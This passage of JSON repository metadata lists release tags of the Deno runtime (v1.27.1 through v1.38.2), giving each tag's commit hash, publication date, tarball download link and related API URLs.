:"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denolan